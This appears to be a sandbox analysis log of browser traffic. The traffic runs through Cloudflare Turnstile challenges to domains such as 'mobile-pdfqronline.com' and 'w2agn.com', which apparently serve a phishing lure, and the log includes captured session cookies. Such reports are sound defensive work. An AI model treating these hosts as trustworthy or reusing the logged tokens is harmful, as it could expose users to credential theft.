Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vokbz-iamgold.mobile-pdfqronline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://vokbz-iamgold.mobile-pdfqronline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c69278df22e27&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c69278df22e27&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/529245995:1730132305:Laa5oq2m73aFLJir1YIIar-kFQTXq6O2pduGpfcbM2U/8d9c69278df22e27/PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d9c69278df22e27/1730134081331/HTYBVlYO-jFT7-s HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d9c69278df22e27/1730134081331/HTYBVlYO-jFT7-s HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d9c69278df22e27/1730134081332/8ab4824bd712c48db70a586f4db3523bbce01cf19d29a29c45a25558c454549d/AwHEUhWTjCn8Lyu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/inwdh/0x4AAAAAAAjGd7wY-0w5WfUZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/529245995:1730132305:Laa5oq2m73aFLJir1YIIar-kFQTXq6O2pduGpfcbM2U/8d9c69278df22e27/PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=612cNYgATxTDloo&MD=Z6lemAgC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/529245995:1730132305:Laa5oq2m73aFLJir1YIIar-kFQTXq6O2pduGpfcbM2U/8d9c69278df22e27/PxLt5hfjqiTPx0sjtRTM1yJo9d0uOquA7rEns6f87xg-1730134078-1.1.1.1-IuqPdMWPk2MuuPdmgmf36o4gSheMJLGvteZUcwaHmaE8n7ftlDUr4X5m_WkV.81V HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /B9Z64HC_oJbkvSmVBaQzfkiG7YNd-0Po/ HTTP/1.1Host: 8sq.w2agn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://vokbz-iamgold.mobile-pdfqronline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8sq.w2agn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8sq.w2agn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8sq.w2agn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8sq.w2agn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://8sq.w2agn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c6b17ae923aaf&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 8sq.w2agn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://8sq.w2agn.com/B9Z64HC_oJbkvSmVBaQzfkiG7YNd-0Po/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjErY2h3UXluTHFhaktPYUY1bThDQWc9PSIsInZhbHVlIjoiY1d2NnpmTGhPR0VJNDg4R2V6THhsU3VaMXhIWUwrcmVBbklQUmxjQnFnVmRGZEJFVlhDMktCbklkUS8rVUt4MlNSbXJUYjZkei83NXdsNm9ocURQOGx4cjcvT1VBOXQ4RThodUoyNkg0SXUyRlVlTURNa3JsSklEajM4VkdyeTQiLCJtYWMiOiIzOTUyYTEwNjc2NzljZGI1MzA3NzcyMmM0YjY4ZmU5MTU5MDdmYWM5NTUzYzNhM2NmMTM0ZTZjZWZjZmVmZTAzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklrNmhTUFNlaGV3Y01IeWF3cE81a0E9PSIsInZhbHVlIjoiZDNtZzZkS01oVGFadCtGckNHRTMwQm9YamZvWGhGbng3RmVBQUdmRkxmN29iQm9jSW9Ea05Ta0prNkNVNFFDZEg0MTMvTDM1WktLSytyWi9WaVR6R3MzWDVTKytzbnVUUHkyTHd6L2JxUUtRVG9vYWF6czJvRm5qS3BBMWVaUysiLCJtYWMiOiI5YTZjZjA0NDliODE1MjU5YmUxZTc0NmYyN2MzMzFmNzVkYTIzOTE2ZWIzNDE1NWIzYzJmNmU5YjNkNDE2ZWM2IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9c6b17ae923aaf&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1575504935:1730132393:tsQBD6pnm-dRZ8ZlJHXvfJ9o3TZjLECqHOVZguSlcVA/8d9c6b17ae923aaf/phHrWSEgkaO_06F33lI9ffv1P4pt8rymxzOY4cyWB4A-1730134158-1.1.1.1-wYIAZ_Bbkih4o4C_Fy0JR15pEMzW4qdIapWRMtYWue1RH4VmlU8jz9iiZIiW1aSQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d9c6b17ae923aaf/1730134160233/8a71020ba386488777a483e1ae773c3ccfea843ec9224ce39a3849d2a4a2d100/hrjXq_u_Ts2Gd6l HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d9c6b17ae923aaf/1730134160237/-JiMk9ZyEBn9URm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/52iod/0x4AAAAAAAwpjSkOf53RqXnc/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d9c6b17ae923aaf/1730134160237/-JiMk9ZyEBn9URm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1575504935:1730132393:tsQBD6pnm-dRZ8ZlJHXvfJ9o3TZjLECqHOVZguSlcVA/8d9c6b17ae923aaf/phHrWSEgkaO_06F33lI9ffv1P4pt8rymxzOY4cyWB4A-1730134158-1.1.1.1-wYIAZ_Bbkih4o4C_Fy0JR15pEMzW4qdIapWRMtYWue1RH4VmlU8jz9iiZIiW1aSQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: img2.leadong-edm.com
Source: global trafficDNS traffic detected: DNS query: vokbz-iamgold.mobile-pdfqronline.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: 8sq.w2agn.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: unknownHTTP traffic detected: POST /report/v4?s=VnI77UMv%2Fxel4LiWfkTryGeF5PcshH9L2dHVaKi%2FUgF6nQ%2FXioiipm4KVrFXkzrLDAFeOYjaM1f4QQixlS1x%2F60y6X%2FFjYJEelxIx0HukPQFNyza8DSZHskGlPHG1aRT1bs9RXrvzK3cQyecd5z9jIwLIqy0GVA%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 412Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 28 Oct 2024 16:47:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 28 Oct 2024 16:47:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:47:37 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: sexQ+LmYueb5K25ouBV0Bzo1WVA5t7cka68=$rcGxkjZoz5Ao/ieAcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=of9SrURN11GZd3gKavVy9RAbzMdGYvTucGzvV3rdmDxU3K6e%2BlHbC50Pmw4Is%2BXafJIio9WvOW4DquGPgHbtcbxmfPsnSjH1Ii0z8ttUattgFIdR00YDjRxVbnmXUwtCa3raLuhyJo7kbEIUwJeJQpT8lGQDFy4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d9c68a59c6028ab-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1444&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=1187&delivery_rate=2004152&cwnd=251&unsent_bytes=0&cid=ea1069953b2cd56f&ts=153&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 16:47:43 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Ps5TQK01DxS4sNEi/9OISaGW27ro9ZbNz0Y=$cJt0NkFJUjQNtA2Bcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d9c68c5ca80460c-DFWalt-svc: h3=":443"; ma=86400
